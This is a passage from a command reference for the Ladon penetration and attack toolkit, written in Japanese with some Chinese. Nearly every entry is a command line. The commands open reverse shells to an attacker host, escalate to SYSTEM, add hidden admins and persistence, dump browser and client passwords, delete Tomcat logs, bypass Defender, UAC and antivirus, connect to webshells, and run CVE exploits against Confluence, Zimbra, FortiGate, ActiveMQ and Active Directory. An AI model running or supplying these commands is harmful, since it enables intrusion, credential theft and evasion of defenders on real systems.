114 トークンをコピーしてCMDを実行(例えばsystem権限からexploerの現在のユーザーへ権限を下げる)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas ユーザーを模擬してコマンドを実行```Bash
Ladon Runas user pass cmd
116 MS16135によるSYSTEMへの権限昇格```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotatoサービスユーザーからSYSTEMへの権限昇格```Bash
Ladon BadPotato cmdline
118 SweetPotatoサービスユーザーからSYSTEMへの権限昇格```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019権限昇格(サービスユーザー権限をsystemに昇格)```Bash
Ladon EfsPotato whoami
120 Open3389ワンクリックで3389を有効化```Bash

Ladon Open3389

root@kitploit:~
##### 121 組み込み管理者Administratorを有効化```Bash
Ladon ActiveAdmin
122 組み込みユーザーGuestを有効化```Bash

Ladon ActiveGuest

root@kitploit:~
### リバースシェル

##### 123 リバースTCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 リバースTCP MSF Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 リバースTCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 リバースHTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 HTTPSリバース MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 リバースTCP CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 リバースUDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh ローカルマシンの888ポートを112の22ポートへ転送```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTranポート転送(3389例)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

ローカル実行

132 RDPデスクトップセッションハイジャック(パスワード不要)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 レジストリのRunスタートアップ項目を追加```Bash
Ladon RegAuto Test c:\123.exe
134 ATスケジュール実行プログラム(時間不要)(system権限)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 SCサービス起動項目追加&プログラム実行(system権限)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

システム情報の検出

136 SnmpプロトコルでOS、デバイスなどの情報を検出```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  NbtプロトコルによるWindowsホスト名、ドメイン、ユーザーの検出```Bash
Ladon 192.168.1.8/24 NbtInfo
138 SmbプロトコルでWindowsバージョン、ホスト名、ドメインを検出```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  WmiプロトコルによるWindowsバージョン、ホスト名、ドメインの検出```Bash
Ladon 192.168.1.8/24 WmiInfo
140 MssqlプロトコルによるWindowsバージョン、ホスト名、ドメインの検出```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  WinrmプロトコルによるWindowsバージョン、ホスト名、ドメインの検出```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 ExchangeでWindowsバージョン、ホスト名、ドメインを検出```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  RdpプロトコルでWindowsバージョン、ホスト名、ドメインを検出```Bash
Ladon 192.168.1.8/24 RdpInfo

その他の機能

144 Win2008の .net 3.5 をワンクリックで有効化```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 イントラネットサイトのHTMLソースコードを取得```Bash
Ladon gethtml http://192.168.1.1
146 ワンクリックミニWEBサーバー ペネトレーション・リスニング専用WEBサーバー```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
获取外部IP(VPS上でWEBを起動し、ターゲットがip.txtまたはip.jpgにアクセスする)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt(無エコー脆弱性の結果表示)
##### 待ち受け```Bash
Ladon web 800
送信 平文を返す```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Base64エンコード結果```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64結果の復号```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Shiroプラグイン検出```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Tomcat指定IPログの削除```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 C#カスタムアセンブリプラグインスキャン```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile 大きなファイルの先頭から指定された長さの内容を読み取る```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 レジストリを変更して2012以降のシステムの平文パスワードを読み取る```Bash
Ladon SetMzLogonPwd 1
153 レジストリ変更による署名検証のハイジャック```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 IPを一括でip24形式に変換(192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC 一括IPをIP C形式(192.168.1.)に変換```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  一括IPをip B形式(192.168.)に変換```Bash
Ladon ip.txt IPB
157 脆弱性検出Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134リバースシェル```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo 証明書によりデバイス、IP、ドメイン名、マシン名、組織などの情報を検出```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo 証明書の一括検査:デバイス、IP、ドメイン名、マシン名、組織などの情報```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo 複数の方法でWordPressのメインプログラム、テーマ、プラグインのバージョンを取得```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo WordPress本体、テーマ、プラグインのバージョンを一括取得```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Exchangeブルートフォースクラック Exchangeパスワードブルートフォースの識別```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 ZimbraメールサーバーZIPディレクトリトラバーサルRCE脆弱性の一括検出```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbraメールサーバー未認証RCE脆弱性EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd がjsp WebShellに接続(cd、k8、ua、uab64をサポート)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell システムバージョン、python、gccなどの情報を確認して権限昇格に便利```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd jsp WebShellに接続(cd、k8、ua、uab64対応)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 IIS-Raidバックドアへの非対話式接続によるコマンド実行```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIPでIPセグメントが脆弱性結果に出現するかどうかをマッチング```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 ルーターパスワード読み取り```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc プリンターPJL任意コード実行脆弱性の一括検出```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Macで製造元を照会(Ladon Mac MACアドレス)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPNルーターパスワード総当たり(デフォルトパスワード内蔵、平文・ハッシュ対応)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 スマイルバックドア脆弱性検出  10.9で削除```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPressパスワード監査、弱パスワード```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Exchangeバージョンの検出```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Exchange高危険度RCE脆弱性検出```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Http/Sウェブページの応答ヘッダー情報の取得```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/Sウェブページのレスポンスヘッダー情報を取得+ソースコード```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/SでWebページ内のドメイン名を取得```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIPでCDNを迂回してドメインの実IPを取得(ドメイン名、タイトル、Bannerなどのユニークなキーワード特徴を利用可能)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Firefoxパスワード\Cookie\履歴の読み取り```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11エコーなし対応Win7、Win8、Win11 Win2012\2016\2019など 10.8バージョンで削除```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwdはNavicat、TeamView、Xshell、SecureCRTのパスワード読み取りをサポート```Bash
Ladon GetPwd
186 DraytekScan パスワード監査 Draytek弱パスワード検出```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Xshellパスワード読み取り```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 未承認SSH-KEY書き込み admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  SQL Serverリモートコマンド実行 SQLバージョン、OS情報 xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Serverリモートコマンド実行 efspotato、badpotato権限昇格```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42バージョンのパスワード読み取り```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan ZTEルーター・光モデムWebデフォルトパスワード検出```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitchルーターのパスワード読み取り```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd NetGear DGND3700v2ルーターのパスワード読み出し```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 T3プロトコルによるWebLogicバージョン検出```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

ワンクリック侵入 InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan複数モジュールでシステム情報を検出```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan複数のリモート脆弱性検出```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan複数の脆弱性悪用GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 未認可のウェブサイトデータベースパスワード読み取り```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan すべてのモジュール```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Citrix Gatewayのバージョンを検出```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 検出Vmware Vcenterバージョン```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 DefenderをバイパスしてPowerShellを実行```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMPでHPプリンタを再起動```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 操作ログのクリーンアップ .NETログ記録の無効化```Bash
Ladon Clslog
206 ARPプロトコルによる生存ホストの検出```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 ミニFTPサーバー,(Windows/Linux標準のftpコマンドをサポートし、ファイルのアップロードとダウンロードを実現)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 TCP送信パケットデータの監視 TXTとHEXを保存 SMB、RDP、HTTP、SSH、LDAP、FTPなどのプロトコル```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 UDP送信パケットデータの監視 TXTとHEXを保存 DNS、SNMPなどのプロトコル```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward ポート転送 ポート中継```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager 未認証RCE脆弱性検出 (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper 未認可ファイル読み取りEXP (デフォルト/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 SMBを完全に無効化し、445を無効化して0day、横移動、リレー攻撃などを阻止```Bash
Ladon CloseSMB
214 指定サービスを無効にする```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 指定サービスの停止```Bash
Ladon StopService Spooler
216 許可ポート 開放ポート```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 ポートブロック ポート遮断```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunTokenトークンコピー実行プログラム```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem権限昇格 管理者権限をSYSTEM権限に昇格```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser降権 System権限をユーザーまで降格してプログラムを実行```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato権限昇格Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision 海康威视 パスワード監査```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision 海康威视 CVE-2017-7921脆弱性検出```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision 海康威视 設定ファイルの復号```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladonテスト専用CmdShell```Bash
Ladon web 800 cmd
226 接続テスト専用CmdShell```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 ドメイン管理者の表示```Bash
Ladon QueryAdminDomain
228 ドメイン情報を表示```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Mndpプロトコルのブロードキャストによる同一セグメントのMikrotikルーター情報の検出```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 PostShell接続ツール、カスタムHTTPヘッダー送信をサポート```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Cmd コマンドを実行/b64cmd をサポート```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 管理者IPの表示、ログイン成功ログ4624のワンクリック読み取り```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 リモートコマンド実行の脆弱性EXP```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladonワンクリック検知回避ツール```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Win11/2022システムの権限をsystem権限まで昇格```Bash	
Ladon McpPotato whoami
236 EXEをHEXに変換、CMDコマンドでファイルに書き込み```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXEをBase64に変換、CMDコマンドでファイルに書き込み```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Zimbraメールシステムのバージョン検出```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO ドメイン侵入 グループポリシー横移動ツール```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 IISサイト情報のワンクリック取得```Bash

Ladon IisInfo

root@kitploit:~
##### 241 ペネトレーション専用WEBサーバーLDAPデシリアライゼーション```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 ペネトレーション専用WEBサーバーRMI逆シリアル化```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 APIで管理者を追加(システムのnet、net1無効化を無視)```Bash	
Ladon AddAdmin admin$ 123456
244 APIユーザー追加(システムのnet、net1.exe無効化を無視)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 APIユーザー削除(システムのnet、net1.exe無効化を無視)```Bash	
Ladon DelUser admin$
246 Rubeusドメイン侵入 Kerberos攻撃

例えばTGTリクエスト/STリクエスト/AS-REP Roasting/Kerberoasting/委任攻撃/ゴールデンチケット/シルバーチケット/ダイヤモンドチケット/サファイアチケットなど```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPacドメイン侵入 ドメイン内権限昇格CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere と vCenter が管理する仮想マシンのゲスト OS と対話し、コマンドを実行```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Dcomリモートコマンド実行のMMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcomリモートコマンド実行のShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcomリモートコマンド実行のShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlmシステム情報プローブ(25、465、587ポート)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlmシステム情報探索```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP リモートでドメインユーザーIPを照会```Bash
root@kitploit:~
   Ladon DomainLog -d 7
